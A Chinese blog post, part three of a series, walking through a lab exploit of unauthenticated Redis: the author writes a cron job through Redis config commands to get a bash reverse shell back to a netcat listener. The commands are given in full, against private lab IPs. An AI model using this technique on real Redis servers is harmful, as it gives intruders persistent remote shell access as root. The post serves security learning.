Redis未授权访问漏洞(三)Redis写入反弹连接定时任务

前言
系列文章

Redis未授权访问漏洞(一)先导篇
Redis未授权访问漏洞(二)Webshell提权篇

Redis写入反弹连接任务

环境准备

攻击机: Centos7 IP:192.168.142.44
靶机:Centos7 IP:192.168.142.66

我们先来回顾一下corntab定时任务的一些基本命令:

在这里插入图片描述在这里插入图片描述实战实验

我们通过攻击机启动Redis客户端去远程连接靶机的6379端口,模仿黑客通过公网的6379端口入侵企业的Web服务器
在这里插入图片描述这里可以看到我们已经成功用192.168.142.44的redis客户端连接了位于192.168.142.66的服务端

然后我们再打开一个终端去监听我们本地的7777端口

nc -lvp 7777

在这里插入图片描述
然后回到我们的客户端写入反弹连接的任务:

set x "\n* * * * * bash -i >& /dev/tcp/192.168.142.44/7777 0>&1\n"

修改数据文件存储路劲为 /var/spool/cron

config set dir /var/spool/cron/

修改保存的数据文件名为当前连接的服务器上当前的用户名:

config set dbfilename root

save保存

save

在这里插入图片描述我们现在查看一下当前root用户的定时文件有没有我们设置的定时任务

cd /var/spool/cron
cat root

在这里插入图片描述
可以看到定时任务写入成功

然后回到我们的监听终端,等待一分钟,收到反弹连接:
在这里插入图片描述

posted @ 2023-01-10 12:37  私ははいしゃ敗者です  阅读(23)  评论(0编辑  收藏  举报  来源